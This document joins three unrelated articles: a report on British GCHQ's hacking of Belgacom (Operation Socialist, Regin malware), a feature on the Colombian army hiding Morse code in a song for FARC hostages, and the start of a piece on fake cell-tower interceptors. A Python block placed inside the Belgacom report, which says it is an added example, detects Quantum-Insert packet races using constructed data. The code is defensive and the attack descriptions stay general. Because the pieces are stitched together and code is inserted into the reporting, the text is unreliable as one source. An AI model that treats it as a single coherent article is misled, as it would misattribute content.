
Operation Socialist: The Inside Story of How British Spies Hacked Belgium’s Largest Telco

When the incoming emails stopped arriving, it seemed innocuous at first. But it would eventually become clear that this was no routine technical problem. Inside a row of gray office buildings in Brussels, a major hacking attack was in progress. And the perpetrators were British government spies.

It was in the summer of 2012 that the anomalies were initially detected by employees at Belgium’s largest telecommunications provider, Belgacom. But it wasn’t until a year later, in June 2013, that the company’s security experts were able to figure out what was going on. The computer systems of Belgacom had been infected with highly sophisticated malware, which was disguising itself as legitimate Microsoft software while quietly stealing data.

Last year, documents from National Security Agency whistleblower Edward Snowden confirmed that British surveillance agency Government Communications Headquarters was behind the attack, codenamed Operation Socialist. And in November, The Intercept revealed that the malware found on Belgacom’s systems was one of the most advanced spy tools ever identified by security researchers, who named it “Regin.”

The full story about GCHQ’s infiltration of Belgacom, however, has never been told. Key details about the attack have remained shrouded in mystery—and the scope of the attack unclear.

Now, in partnership with Dutch and Belgian newspapers NRC Handelsblad and De Standaard, The Intercept has pieced together the first full reconstruction of events that took place before, during, and after the secret GCHQ hacking operation.

Based on new documents from the Snowden archive and interviews with sources familiar with the malware investigation at Belgacom, The Intercept and its partners have established that the attack on Belgacom was more aggressive and far-reaching than previously thought. It occurred in stages between 2010 and 2011, each time penetrating deeper into Belgacom’s systems, eventually compromising the very core of the company’s networks.


Snowden told The Intercept that the latest revelations amounted to unprecedented “smoking-gun attribution for a governmental cyber attack against critical infrastructure.”

The Belgacom hack, he said, is the “first documented example to show one EU member state mounting a cyber attack on another…a breathtaking example of the scale of the state-sponsored hacking problem.”

Publicly, Belgacom has played down the extent of the compromise, insisting that only its internal systems were breached and that customers’ data was never found to have been at risk. But secret GCHQ documents show the agency gained access far beyond Belgacom’s internal employee computers and was able to grab encrypted and unencrypted streams of private communications handled by the company.

Belgacom invested several million dollars in its efforts to clean up its systems and beef up its security after the attack. However, The Intercept has learned that sources familiar with the malware investigation at the company are uncomfortable with how the clean-up operation was handled—and they believe parts of the GCHQ malware were never fully removed.

The revelations about the scope of the hacking operation will likely alarm Belgacom’s customers across the world. The company operates a large number of data links internationally, and it serves millions of people across Europe as well as officials from top institutions including the European Commission, the European Parliament, and the European Council. The new details will also be closely scrutinized by a federal prosecutor in Belgium, who is currently carrying out a criminal investigation into the attack on the company.

Sophia in ’t Veld, a Dutch politician who chaired the European Parliament’s recent inquiry into mass surveillance exposed by Snowden, told The Intercept that she believes the British government should face sanctions if the latest disclosures are proven.

“Compensating Belgacom should be the very least it should do,” in ’t Veld said. “But I am more concerned about accountability for breaking the law, violating fundamental rights, and eroding our democratic systems.”

Other similarly sophisticated state-sponsored malware attacks believed to have been perpetrated by Western countries have involved Stuxnet, a bug used to sabotage Iranian nuclear systems, and Flame, a spy malware that was found collecting data from systems predominantly in the Middle East.

What sets the secret British infiltration of Belgacom apart is that it was perpetrated against a close ally—and is backed up by a series of top-secret documents, which The Intercept is now publishing.

GCHQ declined to comment for this story, and insisted that its actions are “necessary, legal, and proportionate.”


The beginning

The origins of the attack on Belgacom can be traced back to 2009, when GCHQ began developing new techniques to hack into telecommunications networks. The methods were discussed and developed during a series of top-secret “signals development” conferences, held annually by countries in the so-called “Five Eyes” surveillance alliance: the United States, the United Kingdom, Australia, New Zealand, and Canada.

Between 2009 and 2011, GCHQ worked with its allies to develop sophisticated new tools and technologies it could use to scan global networks for weaknesses and then penetrate them. According to top-secret GCHQ documents, the agency wanted to adopt the aggressive new methods in part to counter the use of privacy-protecting encryption—what it described as the “encryption problem.”

When communications are sent across networks in encrypted format, it makes it much harder for the spies to intercept and make sense of emails, phone calls, text messages, internet chats, and browsing sessions. For GCHQ, there was a simple solution. The agency decided that, where possible, it would find ways to hack into communication networks to grab traffic before it’s encrypted.

The British spies identified Belgacom as a top target to be infiltrated. The company, along with its subsidiary Belgacom International Carrier Services, plays an important role in Europe, and has partnerships with hundreds of telecommunications companies across the world—in Africa, Asia, Europe, the Middle East, and the United States. The Belgacom subsidiary maintains one of the world’s largest “roaming” hubs, which means that when foreign visitors traveling through Europe on vacation or a business trip use their cellphones, many of them connect to Belgacom’s international carrier networks.

The Snowden documents show that GCHQ wanted to gain access to Belgacom so that it could spy on phones used by surveillance targets travelling in Europe. But the agency also had an ulterior motive. Once it had hacked into Belgacom’s systems, GCHQ planned to break into data links connecting Belgacom and its international partners, monitoring communications transmitted between Europe and the rest of the world. A map in the GCHQ documents, named “Belgacom_connections,” highlights the company’s reach across Europe, the Middle East, and North Africa, illustrating why British spies deemed it of such high value.

Attack planning

Before GCHQ launched its attack on Belgacom’s systems, the spy agency conducted in-depth reconnaissance, using its powerful surveillance systems to covertly map out the company’s network and identify key employees “in areas related to maintenance and security.”

GCHQ documents show that it maintains special databases for this purpose, storing details about computers used by engineers and system administrators who work in the nerve center, or “network operations center,” of computer networks worldwide. Engineers and system administrators are particularly interesting to the spies because they manage networks—and hold the keys that can be used to unlock large troves of private data.

GCHQ developed a system called NOCTURNAL SURGE to search for particular engineers and system administrators by finding their IP addresses, unique identifiers that are allocated to computers when they connect to the internet. In early 2011, the documents show, GCHQ refined the NOCTURNAL SURGE system with the help of its Canadian counterparts, who had developed a similar tool, named PENTAHO.

GCHQ narrowed down IP addresses it believed were linked to the Belgacom engineers by using data its surveillance systems had collected about internet activity, before moving into what would be the final stages prior to launching its attack. The documents show that the agency used a tool named HACIENDA to scan for vulnerable potential access points in Belgacom’s networks; it then went hunting for particular engineers or administrators that it could infect with malware.


The infection

The British spies, part of a special unit named the Network Analysis Center, began trawling through their vast repositories of intercepted Internet data for more details about the individuals they had identified as suspected Belgacom engineers.

The spies used the IP addresses they had associated with the engineers as search terms to sift through their surveillance troves, and were quickly able to find what they needed to confirm the employees’ identities and target them individually with malware.

The confirmation came in the form of Google, Yahoo, and LinkedIn “cookies,” tiny unique files that are automatically placed on computers to identify and sometimes track people browsing the Internet, often for advertising purposes. GCHQ maintains a huge repository named MUTANT BROTH that stores billions of these intercepted cookies, which it uses to correlate with IP addresses to determine the identity of a person. GCHQ refers to cookies internally as “target detection identifiers.”

Top-secret GCHQ documents name three male Belgacom engineers who were identified as targets to attack. The Intercept has confirmed the identities of the men, and contacted each of them prior to the publication of this story; all three declined comment and requested that their identities not be disclosed.

GCHQ monitored the browsing habits of the engineers, and geared up to enter the most important and sensitive phase of the secret operation. The agency planned to perform a so-called “Quantum Insert” attack, which involves redirecting people targeted for surveillance to a malicious website that infects their computers with malware at a lightning pace. In this case, the documents indicate that GCHQ set up a malicious page that looked like LinkedIn to trick the Belgacom engineers. (The NSA also uses Quantum Inserts to target people, as The Intercept has previously reported.)
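The Quantum Insert described above depends on a race: a forged reply must reach the victim before the legitimate server’s reply does. A passive network monitor sees both replies, which gives defenders a signal to look for: two data segments in the same TCP flow that claim the same sequence number but carry different bytes. The following is an added example, not code from the article, from GCHQ’s documents or from Fox-IT; the detection idea follows public research by Fox-IT (2015), and the packets, addresses and hostnames are constructed for illustration.

```python
"""Detecting a Quantum-Insert-style packet race in a stream of TCP segments.

The victim's TCP stack accepts the first segment for a given sequence number
and drops the later one, but a passive monitor sees both. A legitimate
retransmission repeats the same bytes, so it is not flagged; a different
payload at an already-seen sequence number is what we alert on.
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class Segment:
    """A minimal TCP data segment as a monitor would decode it (constructed type)."""
    src: str
    sport: int
    dst: str
    dport: int
    seq: int
    payload: bytes


def find_seq_collisions(segments):
    """Return one alert per segment that reuses a sequence number already seen
    in the same flow with a *different* payload.

    Each alert is (flow, seq, first_payload, later_payload) where flow is
    (src, sport, dst, dport). Pure ACKs (no payload) and exact retransmissions
    are ignored.
    """
    first_seen = {}
    alerts = []
    for seg in segments:
        if not seg.payload:
            continue  # nothing to collide on
        key = (seg.src, seg.sport, seg.dst, seg.dport, seg.seq)
        earlier = first_seen.setdefault(key, seg.payload)
        if earlier != seg.payload:
            alerts.append((key[:4], seg.seq, earlier, seg.payload))
    return alerts


# Constructed sample flow. Addresses are from the RFC 5737 documentation
# ranges and the redirect target uses the reserved ".invalid" TLD.
SERVER, CLIENT = "203.0.113.10", "192.0.2.5"
SAMPLE = [
    # client request, then a harmless retransmission of the same bytes
    Segment(CLIENT, 51000, SERVER, 80, 1, b"GET / HTTP/1.1\r\nHost: www.example.com\r\n\r\n"),
    Segment(CLIENT, 51000, SERVER, 80, 1, b"GET / HTTP/1.1\r\nHost: www.example.com\r\n\r\n"),
    # forged reply wins the race: a redirect at the server's next seq number
    Segment(SERVER, 80, CLIENT, 51000, 1000,
            b"HTTP/1.1 302 Found\r\nLocation: http://redirect-target.invalid/\r\n\r\n"),
    # the real reply arrives late, at the same seq number, with different bytes
    Segment(SERVER, 80, CLIENT, 51000, 1000,
            b"HTTP/1.1 200 OK\r\nContent-Length: 5\r\n\r\nhello"),
]


def run_sample():
    """Run the detector over the constructed flow and return its alerts."""
    return find_seq_collisions(SAMPLE)


if __name__ == "__main__":
    for flow, seq, first, later in run_sample():
        print(f"flow {flow} seq={seq}: first={first[:20]!r} later={later[:20]!r}")
```

The check is deliberately narrow: it keys on exact sequence numbers and whole payloads, so it will miss a forged segment that only partially overlaps the real one, and it keeps state per flow without handling sequence-number wraparound. Treat a hit as a lead for packet-capture review rather than proof, since broken middleboxes can also emit mismatched duplicates.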

A GCHQ document reviewing operations conducted between January and March 2011 noted that the hack on Belgacom was successful, and stated that the agency had obtained access to the company’s systems as planned. By installing the malware on the engineers’ computers, the spies had gained control of their machines, and were able to exploit the broad access the engineers had into the networks for surveillance purposes.

The document stated that the hacking attack against Belgacom had penetrated “both deep into the network and at the edge of the network,” adding that ongoing work would help “further this new access.”

By December 2011, as part of a second “surge” against Belgacom, GCHQ identified other cellphone operators connecting to the company’s network as part of international roaming partnerships, and successfully hacked into data links carrying information over a protocol known as GPRS, which handles cellphone internet browsing sessions and multimedia messages.

The spy agency was able to obtain data that was being sent between Belgacom and other operators through encrypted tunnels known as “virtual private networks.” GCHQ boasted that its work to conduct “exploitation” against these private networks had been highly productive, noting “the huge extent of opportunity that this work has identified.” Another document, dated from late 2011, added: “Network Analysis on BELGACOM hugely successful enabling exploitation.”

GCHQ had accomplished its objective. The agency had severely compromised Belgacom’s systems and could intercept encrypted and unencrypted private data passing through its networks. The hack would remain undetected for two years, until the spring of 2013.


The discovery

In the summer of 2012, system administrators detected errors within Belgacom’s systems. At the company’s offices on Lebeau Street in Brussels, a short walk from the European Parliament’s Belgian offices, employees of Belgacom’s BICS subsidiary complained about problems receiving emails. The email server had malfunctioned, but Belgacom’s technical team couldn’t work out why.

The glitch was left unresolved until June 2013, when there was a sudden flare-up. After a Windows software update was sent to Belgacom’s email exchange server, the problems returned, worse than before. The administrators contacted Microsoft for help, questioning whether the new Windows update could be the reason for the fault. But Microsoft, too, struggled to identify exactly what was going wrong. There was still no solution to be found. (Microsoft declined to comment for this story.)

Sources familiar with the investigation described the malware as the most advanced they had ever seen.

Belgacom’s internal security team began to suspect that the systems had been infected with some sort of virus, and the company decided it was time to call in outside experts. It hired Dutch computer security firm Fox-IT to come and scan the systems for anything suspicious.

Before long, Fox-IT discovered strange files on Belgacom’s email server that appeared to be disguised as legitimate Microsoft software. The suspicious files had been enabling a highly sophisticated hacker to circumvent automatic Microsoft software updates of Belgacom’s systems in order to continue infiltrating the company’s systems.

About a month after Belgacom had identified the malicious software, or malware, it informed Belgian police and the country’s specialist federal computer crime unit, according to sources familiar with the incident. Belgian military intelligence was also called in to investigate the hack, together with Fox-IT.

The experts from Fox-IT and military intelligence worked to dissect the malware on Belgacom’s systems, and were shocked by what they found. In interviews with The Intercept and its reporting partners, sources familiar with the investigation described the malware as the most advanced they had ever seen, and said that if the email exchange server had not malfunctioned in the first place, the spy bug would likely have remained inside Belgacom for several more years.

A deep breach

While working to assess the extent of the infection at Belgacom, the team of investigators realized that the damage was far more extensive than they first thought. The malware had not only compromised Belgacom’s email servers, it had infected more than 120 computer systems operated by the company, including up to 70 personal computers.

The most serious discovery was that the large routers that form the very core of Belgacom’s international carrier networks, made by the American company Cisco, were also found to have been compromised and infected. The routers are one of the most closely guarded parts of the company’s infrastructure, because they handle large flows of sensitive private communications transiting through its networks.

Earlier Snowden leaks have shown how the NSA can compromise routers, such as those operated by Cisco; the agency can remotely hack them, or physically intercept and bug them before they are installed at a company. In the Belgacom case, it is not clear exactly which method was used by GCHQ—or whether there was any direct NSA assistance. (The NSA declined to comment for this story.)

Either way, the malware investigators at Belgacom never got a chance to study the routers. After the infection of the Cisco routers was found, the company issued an order that no one could tamper with them. Belgacom bosses insisted that only employees from Cisco could handle the routers, which caused unease among some of the investigators.

“You could ask many security companies to investigate those routers,” one of the investigators told The Intercept. By bringing in Cisco employees to do the investigation, “you can’t perform an independent inspection,” said the source, who spoke on condition of anonymity because he was not authorized to speak to the media.

A spokesman for Cisco declined to comment on the Belgacom investigation, citing company policy. “Cisco does not comment publicly on customer relationships or specific customer incidents,” the spokesman said.

Shortly after the malware was found on the routers, Fox-IT was told by Belgacom to stop its investigation. Researchers from the Dutch security company were asked to write up a report about their findings as soon as possible. Under the conditions of a non-disclosure agreement, they could not speak about what they had found, nor could they publicly warn against the malware. Moreover, they were not allowed to remove the malware.

Between late August and mid-Sept. 2013, there was an intense period of activity surrounding Belgacom.

On August 30, some parts of the malware were remotely deleted from the company’s infected systems—apparently after the British spies realized that it had been detected. But the malware was not completely removed, according to sources familiar with the investigation.

Two weeks later, on Sept. 14, employees from Belgacom, investigators, police and military intelligence services began an intensive attempt to completely purge the spy bug from the systems.

During this operation, journalists were tipped off for the first time about the malware investigation. The Intercept’s Dutch and Belgian partners NRC Handelsblad and De Standaard reported the news, disclosing that sources familiar with the investigation suspected NSA or GCHQ may have been responsible for the attack.

The same day the story broke, on Sept. 16, Belgacom issued a press release. “At this stage there is no indication of any impact on the customers or their data,” it said. “At no point in time has the delivery of our telecommunication services been compromised.”

Then, on Sept. 20, German news magazine Der Spiegel published documents from Snowden revealing that British spies were behind the hack, providing the first confirmation of the attacker’s identity.


Significant resources

In the aftermath of the revelations, Belgacom refused to comment on GCHQ’s role as the architect of the intrusion. Top officials from the company were called to appear before a European Parliamentary committee investigating the extent of mass surveillance revealed by Snowden.

The Belgacom bosses told the committee that there were no problems with Belgacom’s systems after a “meticulous” clean-up operation, and again claimed that private communications were not compromised. They dismissed media reports about the attack, and declined to discuss anything about the perpetrator, saying only that “the hackers [responsible] have considerable resources behind them.”

People with knowledge of the malware investigation watched Belgacom’s public statements with interest. And some of them have questioned the company’s version of events.

“There was only a partial clean-up,” said one source familiar with the malware investigation. “I believe it is still there. It is very hard to remove and, from what I’ve seen, Belgacom never did a serious attempt to remove it.”

Belgacom declined to comment for this story, citing the ongoing criminal investigation in Belgium.

Last month, The Intercept confirmed Regin as the malware found on Belgacom’s systems during the clean-up operation.

The spy bug was described by security researchers as one of the most sophisticated pieces of malware ever discovered, and was found to have been targeting a host of telecommunications networks, governments, and research organizations, in countries such as Germany, Iran, Brazil, Russia, and Syria, as well as Belgium.

GCHQ has refused to comment on Regin, as has the NSA, and Belgacom. But Snowden documents contain strong evidence, which has not been reported before, that directly links British spies to the malware.

Aside from showing extensive details about how the British spies infiltrated the company and planted malware to successfully steal data, GCHQ documents in the Snowden archive contain codenames that also appear in samples of the Regin malware found on Belgacom’s systems, such as “Legspin” and “Hopscotch.”

One GCHQ document about the use of hacking methods references the use of “Legspin” to exploit computers. Another document describes “Hopscotch” as part of a system GCHQ uses to analyze data collected through surveillance.

Ronald Prins, director of the computer security company Fox-IT, has studied the malware, and played a key role in the analysis of Belgacom’s infected networks.

“Documents from Snowden and what I’ve seen from the malware can only lead to one conclusion,” Prins told The Intercept. “This was used by GCHQ.”

Morse Encryption in a Song


THE CODE: A declassified and unbelievable hostage rescue story

How the Colombian army sent a hidden message to hostages… using a pop song

By Jeff Maysh

Colonel Jose Espejo was a man with a problem. As the Colombian army’s communications expert watched the grainy video again, he saw kidnapped soldiers chained up inside barbed-wire pens in a hostage camp deep in the jungle, guarded by armed FARC guerillas. Some had been hostages for more than 10 years, and many suffered from a grim, flesh-eating disease caused by insect bites.

It was 2010, and the straight-talking Espejo was close to retirement after 22 years of military service. But he couldn’t stand the thought of quitting with men left behind enemy lines. He needed an idea, and when he needed an idea, he always went to one man.

Juan Carlos Ortiz was dunking his kids in the pool at his home in Coconut Grove, Miami, when he got the call from Colonel Espejo. With his easy charm and seemingly natural talent for creating clever commercials, the 42-year-old advertising executive had earned himself a Don Draper-like reputation in Colombia.

The ambitious Ortiz had shot to fame at the Colombian office of Leo Burnett — the legendary ad agency behind Tony the Tiger — where he created an anti-drug TV spot for the Colombian President’s Office. The ad showed an addict on a bus mistaking a fellow passenger’s dandruff for cocaine and snorting it up his nose. It made Ortiz the first Colombian to win a gold Lion at Cannes, the advertising industry’s Oscars. He returned to Bogotá a national hero and received a commendation from the nation’s first lady.

The success of his ad also brought threats from FARC guerillas, who relied, in part, on the cocaine market to fund their decades-old campaign against the government. “I had gone against their objectives with my anti-cocaine commercial,” he remembers. “They offered me the opportunity of paying them in exchange for my life.”

Deeply concerned by threatening letters and phone calls, Ortiz bought a bulletproof car for his family, and even assisted police in a sting operation to catch his blackmailers. But the threats persisted, and fearing for his safety, his employer urgently transferred Ortiz to its New York office. He took his family with him. A high-profile move to rival ad agency DDB in Miami followed, but Ortiz could never forget his enmity toward the FARC. He became the go-to guy for the Colombian army’s more bizarre requests in their battle against the guerillas.

On the telephone, Colonel Espejo explained that he urgently needed to get a message to the captured Colombian soldiers: help was coming. Daring commando missions were taking place throughout the region, including Operation Chameleon — a six-month operation that involved 300 government soldiers and secret raids. Because the FARC shoots hostages dead at the first sight of a military invasion, Espejo had to convey to the captives to be ready to escape.

How do you reach soldiers held under 24-hour armed guard in deeply rural territory? Juan Carlos Ortiz’s mind raced between ideas: Sky-writing? Aid parcels containing secret messages?

Ortiz had designed unorthodox campaigns to battle the FARC before. In 2008, he dreamed up an operation to persuade pregnant female guerrillas to defect: the army air-dropped 7 million pacifiers into the jungle with a message encouraging rebels to return to civilization. The operation involved seven helicopters, three airplanes, 960 flight hours, 17,800 gallons of fuel, and 72 soldiers flying twice a week for four months. During the holidays, the army illuminated giant Christmas trees across the jungle to remind guerrillas what they were missing. They also wrote messages promoting peace on soccer balls and floated them down the river toward the rebel encampments.

But this operation would be far more challenging. They had to create a message that could be understood by the hostages, but remain invisible to their captors. They needed to give the hostages hope, and encourage any soldiers harboring plans of escape that now was the time. Ortiz agreed to participate, and boarded the next plane to Bogotá.

The Revolutionary Armed Forces of Colombia, or FARC, emerged in the 1960s as a group of armed Communist peasants opposing the government and demanding labor reforms. This followed a period in Colombian history known as “La Violencia,” when fighting between the Liberal and Conservative parties resulted in 300,000 deaths. Driven deep into the jungle by a 1964 military bombing campaign, the FARC built up their strength and numbers. By 2010 the FARC had an estimated 8,000 to 10,000 members, according to the International Crisis Group.

By the time that the FARC and the Colombian government announced a ceasefire at the end of last year, their civil war had become one of the longest-running and bloodiest in the world. The FARC, Latin America’s oldest surviving left-wing insurgency, has been labeled a terrorist group by the US State Department and has a long history of kidnapping to help finance its operations. In the past decade, 6,880 people have been snatched in Colombia and held for ransom — some for as long as 18 years. Five hundred of the hostages are either involved with the military or politics. While the FARC prefer to kidnap Americans for money, prominent Colombian prisoners can be valuable political leverage.

Hostages’ accounts of their time in captivity are harrowing: Sgt. Jose Libardo Forero was one of Colombia’s “forgotten” hostages, held by the FARC for nearly 13 years. After his release, Forero spoke of relieving his mental anguish by bonding with jungle animals and one pet pig he called Josefo, whom he got hooked on coffee. Colombian politician Ingrid Betancourt, held for six years, recalled being chained to a tree by her neck.

Ortiz arrived at the Bogotá headquarters of the DDB advertising agency. The modern building features floor-to-ceiling windows that boast panoramic views of the traffic-choked Colombian capital, but keep out the symphony of car horns playing below. That day he was joined by his team of creative minds: Rodrigo Bolivar, Alfonso Diaz, Mario León, and Luis Castilla, the leading lights of Colombia’s advertising industry. Together with Colonel Espejo, they brainstormed ways to get a message to the hostages.

Sending messages directly to hostages is often impossible and not found in the guidebook of any law enforcement or military agency, says Christopher Voss, the FBI’s lead international kidnapping negotiator from 2003 to 2007. Now the owner of the negotiation firm Black Swan Group, Voss says: “When you send a message to a hostage, you have to assume the hostage takers are seeing it too.”

Gary Noesner is a former Chief Negotiator for the FBI who spent 23 years rescuing hostages and has dealt directly with the FARC. He says that sending sensitive messages meant solely for hostages is “incredibly risky.” Colonel Espejo’s case reminds him of a siege at the Japanese ambassador’s mansion in Lima, Peru, in December 1996. Noesner was on the team tasked with saving 72 hostages. “Secret messages were transmitted through the garbage. We received word that terrorists played indoor soccer in the living room, and a bomb was placed underneath the room and detonated,” Noesner says. “That is the only time I can remember covert messages sent to hostages.” Noesner won’t say exactly how the messages were sent, but adds: “Food and water were going into the embassy. All I can say is… messages were transmitted.” All of the militants were killed, along with two commandos and one hostage.

Col. Espejo ran the brainstorming session with the efficiency of a military operation. He explained that FARC guerrillas usually allow hostages access to radios; it relieves the tedium of long hikes through the Colombian jungle and keeps their minds from escape.

Communicating with hostages via radio is a years-old practice in Colombia. The show “Voices of Kidnapping” on Bogotá’s Caracol Radio is dedicated to victims’ families who send messages to their loved ones via special call-ins. Creator Herbin Hoyos Medina came up with the idea in 1994, after he was kidnapped for 17 days. He now broadcasts the show from Madrid, giving families 30-second slots to send messages.

Ortiz considered hiding a message in a radio commercial, perhaps hidden in the fine print spoken quickly at the end. Then Diaz, the creative director, suggested using code. What about código Morse, he said — Morse code.

Jeremiah Andrew Denton Jr. blinking T-O-R-T-U-R-E in Morse code

It wouldn’t be the first time Morse code was used in a hostage situation; in 1977, one of 52 hostages held captive by South-Moluccan gunmen on a Dutch train managed to transmit the message “get us out of here,” using sunlight and a hand mirror. Then there was Jeremiah Andrew Denton Jr., a United States Navy rear admiral who spent almost eight years as a prisoner of war in Vietnam, four of those in solitary confinement. In a forced North Vietnamese television interview in 1966, Denton ingeniously used Morse code to communicate with American Intelligence by blinking his eyes to spell out “T-O-R-T-U-R-E”.

“It was a eureka moment! We thought about hiding the Morse code in an advert,” says Ortiz. “Then we thought, how about a song?” As a young man, Ortiz was a musician, but his career never took off. The idea of producing a hit song appealed to him.

Ortiz pitched the Colonel a plan as if he were pitching a commercial to Heinz or Coca-Cola. The Colonel stroked his chin. Espejo liked the code idea, because he knew that many soldiers — especially in the communications departments — were taught Morse code in their basic training. Furthermore, Espejo reasoned, “The FARC were peasants from the fields, they wouldn’t know [Morse].” It was a longshot, but if the team could disguise the telltale dot-dot-dash signals in a song, there was a chance the soldiers would hear the message.

Radio Bemba is a small recording studio with six electric guitars on the wall where musicians write catchy commercial jingles. If the DDB agency is in Bogotá’s “Manhattan,” Radio Bemba is in the city’s “Brooklyn,” sharing its front door with an architecture company in a 50-year-old building on an edgy street. Word quickly got around the studio that the military wanted to produce a song so popular it would enter the “Lista 40” — Colombia’s Billboard charts. Producer Carlos Portela, 34, thought they were nuts.

“But they were deadly serious, and explained it was a secret project,” says Portela, who wears an eyebrow ring and produces music for beer commercials. “Obviously we had never worked with Morse code before. But they were very specific about what they wanted. They needed to know if we could hide their message in a song, so that nobody would detect it unless they knew Morse code.”

The team began experimenting with Morse code using various percussion instruments and a keyboard. They learned that operators skilled in Morse code can often read the signals at a rate of 40 words per minute — but played that fast, the beat would sound like a European Dance track. “We discovered the magic number was 20,” says Portela. “You can fit approximately 20 Morse code words into a piece of music the length of a chorus, and it sounds okay.”

With the help of a military policeman skilled in Morse, they coded the message: “19 people rescued. You are next. Don’t lose hope.” It was a signal to boost morale and indicate that help was nearby. Portela wrote the song and the lyrics with composer Amaury Hernandez, creating a thinly-veiled ballad about life as a hostage: “In the middle of the night / Thinking about what I love the most / I feel the need to sing… About how much I miss them.” He even added the lyric, “Listen to this message, brother,” just before the coded message kicks in. The code sounds like a brief synth interlude just after the chorus.

Portela says they played with the Morse code using Reason software, which gives each audio channel or instrument its own dedicated track. With a separate visual lane for certain elements, it was possible to match the code to the beat of the song — and, crucially, blend it in.


Hiding the Morse code took weeks, with constant back-and-forth with Col. Espejo and the military to make sure their men could understand the message. “It was difficult because Morse code is not a musical beat. Sometimes it was too obvious,” says Portela. “Other times the code was not understood. And we had to hide it three times in the song to make sure the message was received.”

Finally, in September 2010, the song was mastered. They titled it “Better Days,” performed by session artists Natalia Gutierrez Y Angelo, fairly anonymous background musicians who’d worked on other jingles at the studio. Ortiz thought it was a masterpiece. “When I first listened, I thought it was a song of freedom,” he says.

With the song completed, they had to get it on the airwaves. Commercial Colombian stations largely only played hits by famous artists like Coldplay and Shakira. Luckily, says Col. Espejo, in many of the jungle areas where the hostages were held, all the radio stations were controlled by the government. “The hostages were listening to our own stations, so we made sure the song was played,” he says. “The code message said, ‘you’re next’ because the hostages thought if they ran away, they would die in the jungle. We let them know that our troops were nearby.” At that time, active commando missions were underway, placing troops undercover in FARC-controlled areas.

Former hostage Major General Luis Mendieta Ovalle Herlindo helped the operation by appearing on live television and making an appeal directly to the guerrillas. Herlindo, who escaped in one of the secretive commando-led escapes during “Operation Chameleon,” said: “This message is for members of the FARC. For those being held captive without a radio. Please, give them radio.” Though it might seem that this gave the game away, to Colombians it sounded like an appeal for hostages to be able to hear the voices of their families, who call in to radio shows.

The song was played on over 130 small stations and heard by 3 million people. Though most Colombians in major cities would not even recognize the song, it became popular in the rural areas controlled by the FARC. By December 2010, “Better Days” was echoing across the jungle. And the plan worked.

“We know of hostages who heard the message and were able to escape and provide information that led to the release of more hostages,” says Colonel Espejo.

Later in December 2010, the FARC announced its plans to release five more hostages as a humanitarian gesture, including a police major, two military service members, and two politicians; two months later, Major Guillermo Solorzano, 35, and Corporal Salin Sanmiguel, 28, were released back to their families; and in the spring of 2012, the last 10 police and military hostages — some of whom had spent 14 years in captivity — were released and flown in a Brazilian military helicopter to safety. Colonel Espejo watched the hostages on TV, waving and punching the air with delight as they stepped off a helicopter in Villavicencio. At the country’s presidential palace, the president, Juan Manuel Santos, said: “Welcome to liberty, soldiers and policemen of Colombia. Freedom has been very delayed, but now it is yours, to the delight of the whole country.”

One former hostage was able to confirm the song’s effectiveness, according to Col. Espejo. He told Ortiz of a clandestine operation that resulted in the release of Private Joshua Alvarez. In his military psychological evaluation, Col. Espejo says that the soldier spoke of hearing “the code hidden in the song,” and revealed how the message was passed from soldier to soldier. The song was even enjoyed by the FARC, who were oblivious to its secret message. Back home in his village in western Nariño, Alvarez was greeted with a hero’s welcome, including fireworks and banners.

“It makes me very happy to think of the hostages listening to our song,” Ortiz says.

Ortiz still keeps in touch with Col. Espejo, who retired from the military and now works as a journalist. Col. Espejo wrote the book El Gran Cartel, an investigation into the FARC’s finances. Ortiz continues to travel between Colombia, New York, and Miami, where he has created commercials for Rice Krispies and Volkswagen. He’s earned a place in the American Advertising Federation’s Hall of Fame, and on a top 10 list of “exceptional Colombians.”

On the wall of Ortiz’s Miami office there’s a photo of him celebrating his gold Lion for the dandruff cocaine ad in 2000, wildly waving a Colombian flag on stage. He recalls how he persuaded a local tailor in Cannes to fashion him a Colombian flag on the morning of the awards. Receiving that award should have been the greatest moment of his life, he says, but that victory was marred by the FARC and their threats. “One moment, I was the king of the world,” he says ruefully, “the next… just another Colombian victim of the terrorists. Being able to help the military with the code project was my way of helping them fight.”

The army agreed to declassify “The Code” operation in 2011 and allowed the song to be entered into the Cannes Lions. “Better Days” earned Ortiz his second gold Lion. “This time,” he says, “we enjoyed it.”


Mysterious Phony Cell Towers Could Be Intercepting Your Calls

Unencrypted Connection by Les Goldsmith

Like many of the ultra-secure phones that have come to market in the wake of Edward Snowden’s leaks, the CryptoPhone 500, which is marketed in the U.S. by ESD America and built on top of an unassuming Samsung Galaxy SIII body, features high-powered encryption. Les Goldsmith, the CEO of ESD America, says the phone also runs a customized or “hardened” version of Android that removes 468 vulnerabilities that his engineering team found in the stock installation of the OS.

His mobile security team also found that the version of the Android OS that comes standard on the Samsung Galaxy SIII leaks data to parts unknown 80-90 times every hour. That doesn’t necessarily mean that the phone has been hacked, Goldsmith says, but the user can’t know whether the data is beaming out from a particular app, the OS, or an illicit piece of spyware. His clients want real security and control over their device, and have the money to pay for it.

To show what the CryptoPhone can do that less expensive competitors cannot, he points me to a map that he and his customers have created, indicating 17 different phony cell towers known as “interceptors,” detected by the CryptoPhone 500 around the United States during the month of July alone. (The map below is from August.)  Interceptors look to a typical phone like an ordinary tower.  Once the phone connects with the interceptor, a variety of “over-the-air” attacks become possible, from eavesdropping on calls and texts to pushing spyware to the device.

August GSM Interceptor Map

“Interceptor use in the U.S. is much higher than people had anticipated,” Goldsmith says.  “One of our customers took a road trip from Florida to North Carolina and he found 8 different interceptors on that trip.  We even found one at South Point Casino in Las Vegas.”

Who is running these interceptors and what are they doing with the calls?  Goldsmith says we can’t be sure, but he has his suspicions.

“What we find suspicious is that a lot of these interceptors are right on top of U.S. military bases.  So we begin to wonder – are some of them U.S. government interceptors?  Or are some of them Chinese interceptors?” says Goldsmith.  “Whose interceptor is it?  Who are they, that’s listening to calls around military bases?  Is it just the U.S. military, or are they foreign governments doing it?  The point is: we don’t really know whose they are.”

Ciphering Disabled by Les Goldsmith

Interceptors vary widely in expense and sophistication – but in a nutshell, they are radio-equipped computers with software that can use arcane cellular network protocols and defeat the onboard encryption.  Whether your phone uses Android or iOS, it also has a second operating system that runs on a part of the phone called a baseband processor.  The baseband processor functions as a communications middleman between the phone’s main O.S. and the cell towers.  And because chip manufacturers jealously guard details about the baseband O.S., it has been too challenging a target for garden-variety hackers.

